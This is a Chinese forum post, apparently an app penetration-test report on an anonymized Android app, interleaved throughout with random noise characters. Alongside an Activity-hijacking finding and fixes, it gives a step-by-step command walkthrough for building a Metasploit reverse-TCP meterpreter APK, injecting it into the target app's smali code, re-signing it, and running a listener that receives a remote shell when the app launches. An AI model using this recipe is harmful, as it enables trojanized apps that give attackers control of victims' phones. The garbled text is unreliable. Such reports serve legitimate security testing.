5 f- p1 X( Y, R( m% k2 d0 o - n6 {3 V" I: T: ^ d; h   & ?1 j8 T4 v, @5 Y# u% l " ~" i+ s! `, M1 k

' m& F, t' G: ^& l" u( N, C( Z9 C4 c; h' ^( L

0 P1 \2 a5 A4 ^+ E- j q" V6 O W6 ] 2 检测结果                    - |- y5 I" J4 Y6 S6 r8 A) J j& |9 d" [4 R: ^

* n" L5 v, n# h9 |/ o: D2 i & M. `( g: T7 G

8 ~ P2 p6 P3 I0 P6 X 1 t0 r, y* |! P( l3 ~ 2.1 某某某 5 \. U& u! h' m- @2 @ ' w* A( p( o+ x6 C% r, L/ ]

. E3 N8 h- O, L# C3 \ 0 O- m* i8 R& K' V

[ F9 S/ F8 {& T( |$ P( P5 m9 s+ ? 2.1.1检测目标 & x+ O& H5 L# E* x! g1 e 6 \; W# l& R* U

2 f' b$ e. P! d) b/ _1 u& l. s4 ^ - r T! b( \0 V3 E

* `, _& m# B+ S4 @6 K# M U0 s* I2 [: Z 目标地址: 某某某某某某APP H# Z* l2 Z7 [+ p" d# C % P0 k! J+ g6 H; N; B

# L. D8 O- y) ]! t# f+ e 7 d7 v: @' h5 T' D

/ ~/ U9 Z) C4 O: N 0 ~+ y2 b i+ J$ S, Y% u9 S 2.1.2检测结果 % I2 W3 h+ V, ^: j4 m 8 t% a9 c: e! I5 s

; e3 v& K9 C) Z% r! |4 S% r) ~ 3 r5 t0 Y( Q% s8 y7 H" l* y

% J* k# a$ c" v5 b5 N4 R4 h$ p: R: m) T1 f. M. q N, n, Y. B4 _: A8 N 2.1.2.1 + J% E8 s: ? L; V+ F5 l & Y) @4 m+ x* d+ b& A; m/ I

( j/ [: p: a/ V3 V( N4 ]! h7 a# q3 K; r

" ]* `! @4 F0 u8 @: r( M3 y( W. y 2 E3 D3 l( t2 f% w% i9 v: M* f% c: m 漏洞链接地址:某某某某某某APP 4 T# q- c3 |" A' Z$ v/ r% P ( m$ {. h$ m9 D/ M" U/ G

* Y9 j9 @! e$ ]8 P 0 P$ @4 [) _- u" G, M0 F7 [

, [; y0 o0 e: S$ g' { 7 u2 `6 B# D0 _+ y4 H/ A   / [9 j' F2 s* h% M& S7 y 4 S2 L8 w+ J0 E% i% [

0 Z. o; F3 z! d* D" Z 5 v7 H, ~2 ~+ T0 }. I7 _

% x2 e( n; ?8 M5 c, B 5 q& ~9 e7 ]3 A6 ^# ^; g 漏洞分析及取证: @4 Z4 p' q- v6 A3 b4 B$ z) ]* H ; q5 j, j: y( K

U% s& F* D- b, q6 a8 w# ~4 V/ y! m5 P3 q

, K0 ]1 ^. z# K 1 L& b7 ^2 |2 S8 Y, K& \& m                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: # w7 W- A8 V) t- g0 b* m8 ~5 R6 [0 @, h1 i

$ ~' A5 A! n) N4 A8 Y) c 2 W- `: F0 u% I- A9 }5 F

) u5 I% f1 C. ? L t: r) @6 Y: q( c1 X' e6 E      1 G2 b, A* E; L" H/ j# E 5 B' A% f3 w1 |) L5 J

/ Q% N$ r( p/ n3 _* E; `# k) k8 L4 S; S4 m% u! K, z7 o

- P/ R% x! B! z; h ) u5 G+ I3 V8 }5 }9 w0 `                       $ P1 C* u2 p% R1 C - C8 y$ i2 I- u" O* |

3 ?: M) P. [ t& K' {1 c- Q2 _& C0 m, Y q3 M

! {3 b8 N; O j1 Y ( G3 \, ]+ W- R( Z3 H 1 d2 ]0 Y% I' k: C , K6 E7 o H: J- ^: }

. s$ \5 L( y7 ^3 u & ]' z5 t! S0 f7 d# i9 a7 O! `

8 d4 |5 L/ p/ z 6 w: e* |' i2 {/ H- S. M & W" m3 [4 b, _7 V5 O6 a, k5 q 8 w5 I0 x3 r) R+ e

, u* {5 R' d7 R- W; T+ R ( z, h" c( {; u- O- K7 T

. t1 s2 h, ~$ l& \1 E: s# C' I; i / k2 J$ P0 M. Q- p3 V+ Z9 F " Q! |/ i4 A, i7 ~7 c 3 |) C! j: x. D! R0 O2 d, D8 f% `$ c

! p1 \* C: D6 }. l/ i3 v9 E) k- q& c- w, p H, c. O. M

% |+ m- ]0 R( \% X - E d& A+ M% D$ @# R 漏洞危害:高 / @1 T# G; j! S" Z # S. Q) U0 e, E% s+ V5 B+ ]

" R) e" m0 Z! m 8 [0 b+ l8 f- K, A
; N" h5 [5 L. A! j' d * l; X: O( z2 s1 _& `& R & V% Y. J/ \# {* c& c, y7 D# K0 m/ x7 y& [- d; b( [& L* }( d, {3 h4 q! ^( u K# N4 H8 x8 `" i( U5 S2 x2 s5 R* [! N1 b; G t7 c" ?) R9 f) m0 {* O( y/ C. n7 K C* B" ^4 t* ~1 S# v4 k+ e% q- x+ R2 R: ]6 V% y6 X1 k. _( A8 O7 x" l9 L0 e( a" c e" U+ B) U: @# g I5 R" ?, n+ D+ q# o3 G+ B/ l4 F; J- s1 q4 a0 j. y5 L+ o$ b! F+ C7 F7 g2 s) q0 W _ E$ l+ X6 g. s+ ~# T$ x8 V9 R5 ?" Q; `1 s% {' T$ B" G, C6 u" | F* z V: P7 }2 u* ^: Z3 Y% i- |& V! u+ C' h$ J4 B- F$ B; C. S" z6 {& Z$ r# Q5 @% \0 J2 Y, J' E+ G; L/ b. f* f2 N X1 b: @7 @1 o2 Y
" x$ j* M: ~- A$ H2 A1 [* R; U& Q, ^: {0 {3 J2 N

* z$ S2 K3 F5 W! H |/ F7 `1 o+ v. N l3 V0 F( f 严重程度 g8 c3 ^& f9 A |. c% z7 o( s1 o( F' C$ u' i

5 [9 k" c( n9 R. M4 L! W 6 c' n9 d y( H _
+ G" \6 G# |- u2 [- [5 {( g$ {/ c8 T% d( t# }2 c, F7 D- {2 t

0 P' p8 L6 F- r; c! r, W# `( X4 i 7 P. S$ W5 H% h3 A7 N4 O ; z% c9 f* V; n% T$ x0 M* {7 O& a& \. h' w# T/ f, C( c

" N2 g: ^% x) {: A+ i 7 M5 v! K& n! X4 ]# N8 X
7 I7 l/ |6 Y: v' W" T * I. h! W6 P$ Y. r2 B, T! N6 V

7 m. L7 n" I$ a; W ( N/ M$ E8 S& ]. R1 D! H, I 0 v( X! c( H# M( M4 ] + W& ?+ s) ~/ q P

2 T% ]. E) [ ]% e + p- m" t& M6 y
: \+ Q" p$ D$ x4 k' ` . _. e% {: h; M. j3 k. [

! o7 V$ P" [& z0 ]( I( m6 }( Z B- S% C2 q+ |5 R- j $ i- v3 M$ {5 |3 j4 F1 Z, O/ i' c& V' i; `" n: c

& Z P+ y+ S, Y# M # Q9 e, Q; S& @0 D% M% `' q" R
! c' x* |9 U; W0 x7 ]4 p & D0 s8 s5 p; m

: f2 z/ g) s! [2 P' B/ S 0 e H& t; g5 s' Q; f; w   ! E, P, z S3 | Q 5 D g& H7 L7 G n2 R

5 \! R6 h. A9 V! {, A* U+ `! o6 v1 H: e3 J8 W/ ~* K
8 [ [0 T0 e. S/ _4 I ! x( _' `0 Q! f+ J8 ^, {- K0 E

+ P: M8 q! f7 }# v) T* A5 c ) s6 s; Q8 W" U4 d' V$ D, g* { 8 C4 B) \1 R: L/ w+ f/ n) d1 {) P $ G$ n; S s7 z# R

. m) F0 @0 @( }$ k, B1 n+ K+ s7 }+ h( C1 \4 h7 g4 A5 |7 Q
) p& q$ a, |' N( P* L. ?1 I9 i 2 U& l+ G+ \8 n2 k' B- |

# J9 I6 l7 X, L. s! V! U y! N ^$ i' M   . u4 S) ~ A6 p8 _. S: n* t# N ( _: d% y; V7 |

% t7 i9 r$ }6 H( O3 V- |$ h$ p $ J; X( [8 w6 [: a$ \
) B7 j% l& z9 R1 R, L% M2 E & K5 r/ {# x) @4 \
6 p( o9 \! ~( L, w9 p, z; G# | [9 N- w0 I$ H

0 J/ X5 @' k V% G. c2 f 5 z: w J, I' s/ S% q$ V   % `* k0 w/ K( u8 Z# c6 _ 3 g8 M, a& }: a! W3 ~$ Z. j

4 I% x' X% y1 k5 w" s3 W8 P( C s6 |+ e; u x" u& ^

* F/ L- @: g& g% @: H' } % ~$ }# Z' S5 z, w 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 # Z* y2 @/ M7 }$ e - Y8 r( T+ ^7 }' Q

! A' g9 b9 w" m9 |2 G1 o8 P 3 a3 l. ?! m) m! i% s. \$ f) R

" s, |0 J# l0 @; l0 N 0 M9 e/ W& F: z$ v1 i           4 {- _6 t* r) ^' P$ W; T$ s: p% m 0 J, u; n( r# ]) a, R0 U' R

7 M+ I7 ?2 X# M( z+ ~/ q! @9 a ( z1 l5 c' b, [

9 p7 ~. L6 b4 }* A6 B. `4 I 0 w8 n( S" X( z( o' Z" `   * g' l1 M: Q. b: D: d; d, p : w! c8 \$ k+ p3 Y% u

$ V7 a; D7 D, \* A' I ; y9 T# A5 e4 w# e& w8 b+ N% e1 Q# @# `

. o' S; n5 T7 @* `% N3 R) L. T; P ^& D5 {7 K 2.1.2.2 / e+ l$ @2 D0 V+ F5 U3 w \/ r- m2 q. @8 [' E" h' c' p; f! y F( q

9 E2 j( J7 Q! Q+ w& v $ R* B% @$ \2 p* K: s

& p# s# G/ I/ P2 H& j' i5 | $ u! m" {5 b% F1 I4 X$ P* }4 [ 漏洞链接地址:某某某某某某APP 5 _! u7 \' o: y, W# M$ D4 E) A$ d4 Y& q* b6 L5 G

* G3 o. h9 l& \# z, O 0 C# G/ o1 h4 ^4 ^1 b5 n$ i* _

F% R$ @5 A4 @4 A# n+ | : q+ D) y K9 `0 ^ 漏洞分析及取证: ! d! ]2 n4 G2 W# s& `( }0 u. e + F" o3 E. M# i3 z$ A0 e

8 H% D& m+ b8 T9 k8 X( @: b. ]* F& B ?8 a/ { y+ x( e

& M' W, ^* ?+ E$ a$ L0 L+ R+ h1 e+ w C                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 0 D5 U/ N* p8 i: [; C O. A5 J4 `5 O' |

( C- {* Q p- u1 c* l$ C! _: S# G3 E : A- U5 U S# v

! }) n$ a: l( v& @: ` + b+ y, O! s( Y; f4 Q Metasploit 生成木马 apk $ h7 ]* `0 Y0 Z2 R- k: ~ % v/ a' {% Z7 L8 k7 {: ~! H5 t

9 |% ^5 u9 e; p. | X# _7 c& x ; f3 `6 k* A! i% k, \! ]

0 v5 R1 J& o1 e( m1 }* U # h, }# t* L9 a msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 1 R$ i$ O" I8 y! X6 k1 O* @9 m6 j. y% J2 R2 P

- a) W o8 F, A5 D# O+ Y % Z: R* e# |: N ?# ?! Y& C

5 c+ [" X+ [ Q2 j6 b6 s ) c& H" X" ]8 L% {# N. k, T( P 反编译目标apk和木马apk ) X7 K: x, P7 k$ o1 M& r8 w9 o5 W9 z, E# @; L' B& u

2 }6 p" M# ?7 C u: l+ W# P0 c 6 v* d, |7 ?, r* z2 `

. E5 K3 D% c- F+ W' H' g 7 A: |0 o( Z( a1 F* W0 q* n3 b apktool d target.apk
- d7 @& y( l9 C; a& @- W9 U/ [0 j5 _7 u! ^6 a1 g4 \) l apktool d cockhorse.apk
8 o, I+ Q- E% F4 V- e* ? " i/ G" q$ l6 B9 r7 R+ _

+ J. U+ S/ I- y 6 M5 J2 ^, d- f/ S3 C: m) r

- V( Q2 L/ K8 [) o8 a5 V( L" A5 ~+ T 木马 apk 注入目标 apk ' _2 W; M3 F" R5 i8 M$ U4 t& e ! y& G8 H/ ]5 u: W

2 z5 C: O, u4 i( l, M . q$ A! F' q7 H" E0 }$ k

) P" A3 ^4 f5 I# s : g* K' c( Z3 ?' h3 }4 N5 \& H( \: j 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
% s! D2 T8 D4 Y1 f* ^: G) c& h3 S: T+ A/ y1 w* \* k invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
: F5 {/ x* F7 Z1 s: S7 K: p ) I: y' R8 y; ^9 @5 f3 r

0 B" k3 N7 W. L( C. m$ t7 d & a+ }) ]" F8 q

4 [' |% B8 |& @ B% n: g0 w . u, `1 ?2 ^ i4 \+ j8 [/ ?$ [. m 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 , j6 n8 p! i, J! Z. e4 d5 L! b1 K4 N% u, S! O# q. T

& A0 K4 n" n' G) l6 `8 f7 q; l- }. U & b" R8 ~4 P3 X9 x) m! ?" b! m7 I

+ k- ^8 s; X* l4 f a7 n& N " ?! Z" w. r" U7 a$ p 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ / @$ a: L7 H5 {+ u! `; D7 D, L$ S $ ~2 L8 f; b, ~: [* d% J& Q A" L

+ o1 P+ l3 _! k5 O' S# n: u( P$ L, I - \- d) j9 j) d8 b

8 y+ S3 s4 |& K) u. R5 c) I% B& t+ [3 M+ e' l$ e% v 回编译生成最终 apk . T2 D9 x# B7 v3 d+ L 9 b) B8 h6 b* _) m# I0 I8 N

) I6 p: H9 j5 Z& D$ j7 K: B) F 1 N9 f+ m" q& X+ F

! W/ p8 h9 r, |( |8 b9 z , J7 D: {- t3 s/ d4 a 重新打包 * u1 D9 M, T/ O' ?: b* E5 s: P7 Q$ d6 Y

; o9 D; u9 E* u) [! {$ e$ E2 O1 s( J3 g; |" q5 [

9 N! f! I+ e- u$ M2 R * ^" f! |9 Z- h" E7 b apktool b -o repackage.apk target_app_floder - g4 t6 p+ L0 {: t4 q5 P/ E) u) Y8 i2 B/ A

) q1 |3 e0 |; `- ]* ]3 Q# O0 \. q6 i3 k* t( _9 R% f/ @! a

$ X$ a4 G8 B* f) n- H 6 R! c- n3 j+ z 创建签名文件,有的话可忽略此步骤 0 g8 i0 e# w2 | d8 g9 q $ V( @5 R) W! @7 t! u

3 R C. E0 N3 b9 F& p 5 \( c6 P3 d* K7 M$ w

o; X# w5 a& l/ F' Y$ @) d; W! s* ]# V) ^% G& I0 V e* \. | keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ! X0 b) a# k8 v3 d I+ H! v0 _ 2 O: ^+ D \3 j E

; m6 o9 t# y+ r 0 R7 c0 B1 A# Q8 h$ L& x. J# {

$ [0 U9 P9 n5 {: a5 S2 `; M* ?. ^ ) {* O( w! q" M8 h 签名,以下任选其一 " }' a* s) m% A% v- P- W R; {/ S) s7 L. E

" b2 I+ l( H# j 5 z. P+ s+ c8 [8 I {$ e! P! H

8 r, f$ K" @. q- k+ {3 f$ Q& v3 s4 Y/ v, R jarsigner 方式 : D% w0 \9 u9 N) n7 q: [- N( ]) y " C! u K5 e6 j3 a! L4 S4 F% B

M, p- F" }* t. U! I1 E. S ' j1 p9 L5 v& A1 @- G s. t

u1 [/ s, g# l* s8 s 2 F1 x6 V" K% z# i: U jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 0 j6 [ I" A' S: f4 A 7 U* ~+ ?$ b+ d4 m$ J4 g6 W/ r

9 D% @: M, _! |4 `) R* Y2 d5 y6 `7 h7 N9 d2 m8 z8 ^0 B$ A+ h

# {; N- [' j3 d( e * m( p# b$ s) ?7 M apksigner 方式 5 k: ~4 t9 p& A1 G/ H7 T, _- M- e/ | + y6 H C4 Y# g, E

s& G2 x/ G/ g8 V* O) W* i2 P: J$ g 0 k; N. U4 q. ]0 C

/ A9 p; h' N5 y: v: l v; R4 q" l 9 h$ E4 @( b1 N$ m* b8 ` apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk - c r& C- {0 t% X! R5 T) A( ^7 C! ]- P

- u" \2 U' ~. ?5 M4 t% W; l8 H; ?* B8 P! b$ Y/ i

# O/ R4 j+ D2 i4 N ! ~8 Z2 C- m2 ]3 |" z! j3 l 如需要禁用 v2签名 添加选项--v2-signing-enabled false 6 @+ a9 a, P7 e* k0 K- F , Z! z) h0 T) F6 A! `3 K( M$ c# [

3 {3 R# k- a" q4 G$ t9 C3 T # T; I. r: o: h

) a; E. X3 t! t1 f: @7 o 0 w& d# p T6 h 验证,以下任选其一 0 |+ w9 w3 r7 a4 B8 y* L$ n/ i 5 o( S" J4 Y9 @

; U6 E" W0 c w- |; {( W8 \( O - ^* v; `. S: A

$ i# b* Z Y# N+ E9 I ( Y0 k" s' d5 N% u5 m jarsigner方式 5 m( F! t+ {, h 7 w l* t7 {* V7 B; n6 @' d8 j

3 _- G) q( `6 e9 v' i! |7 V6 V p6 H/ T, h$ R; C5 z1 h

: _* a: n, ]) k4 \2 L# Z8 R, B2 g 6 w! G9 S3 X7 u( G jarsigner -verify repackaged.apk , {/ b' X9 |' d- |: L6 V6 f & I- W% I0 `% H8 F/ [ L

0 }5 X" p5 L% Q/ O; j# i" L; v 7 H. z6 d7 S$ u; m+ H$ K' h+ F

7 c+ f6 F6 X) c5 \ ) b F2 o8 Z( a0 A6 A apksigner 方式 7 F9 v/ p% J( h% J' O9 ]! |% F # Z1 Z- z5 b/ N+ L5 ^3 U# h

/ c" `' C, H: `6 B! o0 e6 {0 a+ F8 C+ J+ m: Q8 M2 j

/ q+ |6 X; D9 n8 C) b3 [+ t % P/ V& q) w( {8 N apksigner verify -v --print-certs repackaged.apk 4 z h0 a) P1 e5 \# S 5 u- D) p' ?1 V# W/ P: ?! o, @) a

& B" Q( n6 n$ m; s% ]) P% q* I $ o6 `3 g! o' y

( w4 B7 P0 w4 {5 Y9 ^, [' j! l( l* Y# c+ P- l9 }; h6 Y, M/ W keytool方式 ! g1 A! L8 b5 \5 y- m6 l* s0 l& F h. Q% e# f2 K, W# }

$ V/ r: Z* h8 z/ Y9 U $ ?6 _( J2 s1 }# K

& q0 N) f( x+ z, n+ P6 } w! J# K , H- g# B9 I' n keytool -printcert -jarfile repackaged.apk , C# I- F. d# z# g- S7 K6 P. [1 c" v4 _6 ]3 H9 `

. a4 U4 X8 h9 x3 }; F$ B: n! w C2 A% D4 g% \+ M! p

+ W$ A9 M |; \: |. Q. K7 q9 m0 l. y7 e, x" m: C% q 对齐 & t1 E7 }5 E% M0 r 4 M. l. A, B# y

k8 [; S, j! b% f. Z. H/ k 5 D) J: R% D1 e$ z+ N* y. v; c% T

, P; V' V, [# E* b8 |& t: R0 `+ C' ~ 字节对齐优化 9 H8 q( U# V' u" X2 m: f% O7 T! R0 n/ a3 }' R- p) X6 R

2 Q N1 f$ {7 s, i/ T4 R8 G( i& { / M* s, a C, p- `! C/ g

6 _; m% {: X% m2 h, ]3 a% Z" R7 `& M; H+ j0 J0 u zipalign -v 4 repackaged.apk final.apk " l5 y5 L& P' Y . U0 B- h; }$ _ I9 j* E1 ~" W

3 `2 n8 F9 ? j! t * r/ i, P7 [( ?

8 H: ]; ^1 o- H* H7 O 8 W w" }% K! Y, j! z t# T0 ?* n 检查是否对齐 ' v: B) {/ X4 r9 K# G* G( `. s( P9 O ( ~6 c. b! q# Y! C4 v

- j, w! u, x& J% g6 {5 a5 ? 8 A$ V" j9 i ]/ M3 `

9 _$ B! r0 q) U3 e1 x* O ) ~2 s% {& P0 B9 d) P zipalign -c -v 4 final.apk . S2 |/ A" t# \1 g% V7 h# p- ` ( V9 q) G5 s' a5 u! w: _

- X. L# s P. A 1 M" g+ X; _, G4 y! \

5 c- ?- A# M* D7 Q0 m 4 h0 E3 |" b* D5 A6 G, h2 v6 I) ? 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 0 z; V3 p' |7 Z4 {3 K8 C1 Q ' Y, T" \1 b" F' @* o! m

9 r5 V5 R. F5 ] S! P5 q' D8 B( V3 ]% O

/ R$ }+ w: D% ^9 q g$ ?! J8 g s( z: p! w0 D 启动Metasploit控制台,配置参数等待上线 + O9 G6 ^: j/ m7 y' e 0 l& T' E. H3 X

% ~' i/ ~& @7 C/ X 5 ]+ z }$ y- k% y" E

' {; N% B7 B7 Q: M7 t \- m. i - `0 W' P* w( ]* r. v) F" k. i% i% q$ Y 在终端依次输入如下命令 ) Z2 J: e! h' a" w 5 L+ j5 t5 k' V

8 N/ E8 }) [9 V/ _3 g $ {6 C3 z/ {# a) R

/ x2 U$ ]4 _/ o6 f5 i1 v8 D - y0 X5 J* R+ E5 }# {) e msfconsole 0 ?& A0 {& |+ }' W, R) C6 Q# n% D' S( e+ w3 D9 h: ^; r1 n

a3 D' Q; Z- s$ D5 j z- w: Z1 h' _& f J9 Q! G/ k, l; B

$ p. y. K" ]( {, j9 f f: J+ W; ` use exploit/multi/handler 1 u, z% ]$ T. G# I3 O/ ~! l: `1 V/ U: O; `+ {

; j' |1 E8 P$ ^& [; C2 x : }7 T- W6 ]! t2 b+ t! s

6 l9 f- x- p# F$ {/ Z$ m8 Z) m( d% l/ |$ E+ y7 J- C set PAYLOAD android/meterpreter/reverse_tcp . @2 M/ u8 n3 c3 k7 B' P6 A0 R1 t/ V6 ?) Q- u l- h1 ~1 _; _

3 m! j7 G: P/ h- M0 b# ^3 j( |* W: M: g, r; ^

9 V8 c/ m* Y/ t: ]8 ^- ]# w : ?1 J! B& I& @ m0 J) _1 B1 v set LHOST 192.xxx.xx.xx ! h: h, M, q; B0 a5 L% ^ y( e& o+ s$ C" b3 p2 L$ o% w+ z

/ l; E3 m# f' P8 ^: v& O+ I. k7 ]" t( s+ \. A

9 J6 @7 R. z3 w. K/ H9 V5 I9 D" J2 ?9 f9 @, M5 @5 ?# C0 Q/ l7 K7 _0 L set LPORT 4444 9 J8 b) j' D6 `! P. X- R: M ( T; [6 W2 W- s8 b

* t7 K1 h- `8 z) I3 S8 S) S$ Q$ w2 a" r6 I" |! [4 a

( d1 K g! P2 O2 o1 f8 ^/ ]4 c $ M2 a4 I. ~0 D( N exploit ! h& @7 G1 Z# i+ K9 L 6 W. F) M/ y! e( ?7 ~& s' Z

# r1 w5 E$ z) n% t- t " R. v ]) J/ |

" [- k2 f1 k! T" h+ n/ ]; g7 L- C8 g& ~ 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ; ^1 R8 n6 _% u" f1 c: P# |2 R7 Y 5 e* }3 b) r! X O: u

* r* S, y* e7 i8 i4 T/ n0 B4 t / C: x" Q Z% a6 V% x0 H1 z5 F9 R

" |/ G" M1 }) ^$ @ $ c3 Q: v* j, E/ p 漏洞危害:中 7 W7 `0 b/ M, o+ V+ ^ . p1 M4 B' S4 m4 a5 e

& x: Q- c: i4 z& M # Q1 N9 e, c9 ?* w4 n1 H
/ ]9 H: n8 `4 |- o' b 4 C$ H5 b+ N0 j. C0 Y $ h* d$ `+ E. } Z5 }7 n# S1 I7 f4 t3 Z0 x$ S 9 L! g( U0 _. ?2 d) x8 Y; d! |. B5 {! _0 x) }4 A& z6 I: w) p. A; f9 m/ @; v" I) B6 l$ q. h: B3 }& K3 w- V( _4 k) [% t5 X% ] x8 t `3 ]* D3 h, S$ J! J$ M8 t7 P4 V/ z7 H+ M7 V) u6 u `0 b) T& J7 k2 r" [ e2 y2 R& ?1 `8 l+ m! A* r" L, m! t* A1 k1 l) R& z- e, _: O3 C6 Q' M5 d' A5 ]) I2 G+ _/ Z t3 h- ^! W( V5 J2 v0 q2 g- l; p. x: F! }. p+ W3 m6 t+ c$ r8 Y8 A) {9 F2 H, o( W7 U% G! ?: A# _6 X( A+ _ f$ R6 r# x. B1 |) k7 m/ e, T2 R3 X6 v$ N; T. d0 ]6 e1 f* b1 P/ a4 ^2 _' Z* v$ H" Y2 ~& G4 e# E5 B+ u% H8 o, x0 u( ]6 H* q7 _# i& y. i: W! l# r$ f X- R% f! T
& h+ l9 f" {- W % J9 R% [; P" M: Z! g

8 E V, y3 C! x5 K2 R8 m- c8 G: m4 i( R* Y 严重程度 ) Q; U+ S* `" u8 ^: T' r/ C8 T+ @5 t4 m

8 W! O1 }6 ], ^: |3 @# _: v; k + P4 j7 q, _' ?3 a0 W
0 g0 z+ a" [7 V6 |8 K# N) o, ~$ Q6 t/ k) l' `& w! w

8 u- k7 W& u; h6 I! U" n # k9 o" A- N& P# m / p! i* \0 X; L3 t+ u! p2 W " M5 d( f5 v4 v4 ]8 }9 H, N' f

4 E# b8 ] R! I * `: e4 O/ T/ x( t0 k
0 h- z4 Q& j @; J* e3 H5 K + O; Z8 S" I5 I; B

S( P; R& I: Q. A& ]2 l9 l 4 n) N1 z1 b+ z $ V, U, I! z9 T/ Y& G! @& A8 I% g5 V. z5 Z; D. s+ R

3 j' V* @* [* n t1 i) R2 y$ y B& { T" V# `2 c
- C7 B5 ]# {! Z" m9 K/ V9 d2 ~: T! Z& Y, q9 t( t& Q# y6 `, {

9 z% a+ B1 l- [$ ?4 I * i4 P8 F7 z! x- ^ ! l4 Q( z: z$ Q 3 a* s; E- e8 I5 N u2 L; J1 T

" y+ Q8 d6 h! w4 L4 z: @, H+ f; c. r1 U* i4 Z7 v; R" s
) e t) ~. Q; ^8 V, K0 L7 b4 l$ x$ y. c - Z- C. }8 a: C/ X. { k0 a' I 5 B6 |& t8 o1 L7 F, T ! `+ n; p: t+ k" ]3 h5 N

3 O. @- h% M8 p7 [! k% U; |! ~) W e( q/ ]7 P   % B2 ^8 X7 t# `# n 5 {/ U" R7 E: l/ x

! [. T& X2 f1 T k9 `& ^/ h9 P" `8 p9 {$ |+ \. g/ `
r1 n4 Y' O- m( i; |3 w! e9 `3 Y9 N% Z# T1 k

6 M. Z5 x7 x" c ( \8 Y& d1 b6 a0 N r- K & w. Z! j' V- ~& i; b 9 g* K& X/ X) g6 G% l% i+ f& \

, G/ p, n1 a5 u+ B6 j/ A' w 7 d3 z/ E5 H) i4 W! H# e: R: A, r
; w- a Z4 c+ Y3 v! y4 K* Z) _, @. C/ n: Y$ \4 k3 D( P( r8 J4 u+ r" Z6 Z 3 a) I9 H! Y5 s I6 J4 K- _2 q ], a: u Y# I/ o2 ~

( H1 Q/ w, ~# c% p, n5 d- g % D+ w6 W+ C3 f; p   1 w) ]7 R; {" Z& h+ z$ D! w; C & |0 S2 ~6 I' Z! ~* h$ f

0 {7 Q$ ~0 V$ i# p: L' g) N 2 A) \8 e3 \0 m$ s- d
% i" C- G0 l" a- w: Z; a & q1 w+ w/ ? b' ]/ n( n* l, o
3 X; A% b& Q- v3 W1 W5 o' Q % q- L- A+ Q T0 C7 a3 U8 f) O6 x* K

1 F5 k4 ^! Q- W$ g; y$ b- y $ \* P' C1 P5 f6 h, z& N m   3 Z& e% o3 w- X ! s" ~, v) u. t" }5 W

4 n D4 r8 @! `0 y ( s( D; g% H3 u

# g) b& L! L5 ^" c$ P ) T4 w$ o2 `( z. | 修复方法: ) T) r7 F' M' A1 b. t. L' i& {- S/ @! z# ~5 R0 m

7 w0 h- Y. W1 ^2 `4 M" c' v: t 1 `0 y+ l. F- @$ i& @

# Z! }8 e) Q8 @! ]7 E- e _3 ~ & n% A4 z+ q ]7 N2 b* O% H0 m               1. APP 启动时应做签名校验防止二次打包。
) q; [ s8 K, ]1 L9 ^ % |/ [% b) i, j; o, D 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 5 u" {+ f4 u& t( y 9 t0 ]- Q4 K, M/ n4 ^& C

5 N; f! _- Q! {0 m% @2 W7 f - F! f/ |" ~2 P 1 F, v5 P+ O3 h8 |1 F( t; ~2 T& O/ {5 j/ ^* X, m% [

' F) V u+ ^* B0 N7 ^+ o* x1 Q/ z- j6 r   9 u/ ~ }6 L0 ^9 r6 b. }' V* Q% q 7 \, d$ h" s" }' N) N+ U, c

4 [ r$ Y& L {$ R% k+ f) ^( u# M4 r( ^% g+ @" A$ P 3 o6 U8 @6 a8 X' R 1 m$ T0 M% d0 s! N5 T, u) R3 Q

5 l$ [: U8 J: T+ W- h; z# U5 c. M- \6 Y/ T
+ A+ m' v9 w ~ . p& h0 u$ L0 @7 ~

3 Z3 J* i0 g1 |/ ~0 T$ u! U8 m ' Z- g7 H+ @7 Z" {. q; j6 Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表